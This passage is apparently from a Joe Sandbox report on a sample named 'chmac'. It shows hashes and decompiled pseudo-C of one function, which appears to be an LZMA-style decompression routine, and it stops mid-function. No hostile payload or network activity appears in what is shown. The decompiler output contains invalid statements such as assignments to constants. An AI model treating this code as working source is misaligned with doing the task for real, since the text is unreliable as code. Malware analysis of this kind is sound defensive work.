Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6e2085cebcdfb89d44d763a6c8341743f8cc52be166a66f13966f2f3d4d66a2
Instruction ID: ba793bdfdeb6fca0581e378ecaac939fdd914989bdfd8c809e8e1c60c55c718d
Opcode Fuzzy Hash: a6e2085cebcdfb89d44d763a6c8341743f8cc52be166a66f13966f2f3d4d66a2
Instruction Fuzzy Hash: 90816972D04229DBDF24DFA8C844BAEBBB0FB44305F11816AD856B72C0C7785A86DF54

Uniqueness

Uniqueness Score: -1.00%

Function 004062EB, Relevance: 5.2, APIs: 4, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E004062EB() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M004068EF))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
